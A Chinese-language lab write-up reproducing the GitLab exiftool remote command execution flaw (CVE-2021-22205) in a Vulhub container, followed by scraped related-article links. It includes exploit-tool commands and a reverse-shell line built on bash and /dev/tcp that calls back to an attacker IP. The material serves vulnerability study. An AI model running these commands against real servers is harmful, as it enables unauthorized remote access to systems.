1 漏洞信息

漏洞名称 Gitlab exiftool远程命令执行漏洞
漏洞编号 CVE-2021-22205
危害等级 高危
CVSS评分 7.5
漏洞类型 中间件漏洞
漏洞厂商 GitLab
漏洞组件 Gitlab exiftool
受影响版本 11.9 <= GitLab(CE/EE)< 13.8.8
13.9 <= GitLab(CE/EE)< 13.9.6
13.10 <= GitLab(CE/EE)< 13.10.3
漏洞概述 由于Gitlab某些端点路径无需授权,攻击者可在无需认证的情况下完成图片上传,从而执行任意命令。

2 环境搭建

2.1 环境概述

  • Linux操作系统(Vulhub)

2.2 搭建过程

加入到漏洞目录下拉取漏洞

cd vulhub/gitlab/CVE-2021-22205
docker-compose up -d

{width=“5.761111111111111in”
height=“0.6458333333333334in”}

访问漏洞urlhttp://192.168.1.136:8080/users/sign_in

{width=“5.759722222222222in”
height=“2.2708333333333335in”}

3 漏洞复现

直接使用工具进行利用,下载地址https://github.com/Al1ex/CVE-2021-22205

CVE-2021-22205.py -h

{width=“5.761805555555555in”
height=“3.7881944444444446in”}

验证下,发现存在漏洞

CVE-2021-22205.py -t http://192.168.1.136:8080 -v true

{width=“5.756944444444445in”
height=“2.298611111111111in”}

创建目录,来判断是否能够执行命令

CVE-2021-22205.py -t http://192.168.1.136:8080 -a true -c "touch /tmp/success-2022-07"

{width=“5.761805555555555in”
height=“1.7493055555555554in”}

可以发现创建成功了

docker ps        查看容器id
docker exec -it 84(容器id) /bin/bash
cd /tmp
ls

{width=“5.761805555555555in”
height=“0.7847222222222222in”}

既然可以创建文件,那么我们可以创建执行反弹shell脚本、并且添加执行权限和运行该脚本的命令。

CVE-2021-22205.py -t http://192.168.1.136:8080 -a true -c "echo 'bash -i >& /dev/tcp/192.168.1.1/2022 0>&1' > /tmp/shell.sh && chmod +x /tmp/shell.sh && /bin/bash /tmp/shell.sh"

{width=“5.759722222222222in”
height=“1.5840277777777778in”}

成功反弹了shell

{width=“5.759027777777778in”
height=“1.5347222222222223in”}

4 修复建议

1、升级Gitlab至最新版本

CVE-2021-22205 Gitlab exiftool远程命令执行 复现相关推荐

  1. 【安全通告】创宇安全智脑:GitLab ExifTool远程命令执行漏洞在野利用(CVE-2021-22205)...

  2. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  3. GoAhead远程命令执行漏洞(CVE-2021-42342)

    GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...

  4. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  5. Hadoop Yarn RPC远程命令执行

    影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可未授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在未授权访问漏洞,此漏洞存 ...

  6. 代码审计-dubbo admin =2.6.1远程命令执行漏洞

    前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...

  7. SonicWall 远程命令执行漏洞

    SonicWall SSL-VPN 远程命令执行漏洞 漏洞描述 SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 漏洞影响 SonicWall S ...

  8. flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  9. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

最新文章

  1. debian 9/ ubuntu 添加swap分区
  2. kalinux实现自适用全屏、与物理主机共享文件方法
  3. Java try和catch的使用
  4. asp.net中的MD5加密
  5. java第一句_Java如何开始第一个项目?
  6. 第二十四章 异常和错误处理 1异常
  7. 非线性系统【三】LaSalle不变原理
  8. k3 cloud api java_调用K3Cloud webapi
  9. vax_patch.exe谁有这个文件,可以免费分享一下嘛?
  10. Ventoy+WePE 装机教程
  11. 联想IBM笔记本驱动
  12. iphone和android照片传输,iPhone与安卓跨平台如何传照片图文教程
  13. U8C报表模板已设置,任务已分配仍无法查看报表数据
  14. 保利威视教程:什么是HLS?
  15. 人工智能导论(数据挖掘)
  16. 仿微信朋友圈拍照上传
  17. 图片按比例缩放,鼠标滚轮调整大小
  18. ORACLE中分钟用mm和mi 标示区别
  19. Linux之git用法
  20. tp5.1 乐视云上传视频文件(https请求http乐视云上传接口)http网址下上传视频(https API接口)

热门文章

  1. 推荐一个免费的生成词云(word cloud)的在线工具
  2. 使用VSCode插件CodeRunner一键编译运行Java
  3. java初始化含十个数的数组_java初始化数组的方法
  4. 06年及以前韩国星际职业联赛及选手资料
  5. Jetson NX Ubuntu 18.04下谷歌输入法候选框不显示解决办法
  6. 计算机系统相关(嵌入式)
  7. 在vs中char类型的实参与LPCWSTR类型的形参类型不兼容怎么解决?
  8. 帧中继环境中NBMA模式下OSPF的配置
  9. OSPF的NBMA环境建立邻居及排错,理论+实战讲解,干货分享
  10. matlab用到两个工具箱有重复函数文件处理方法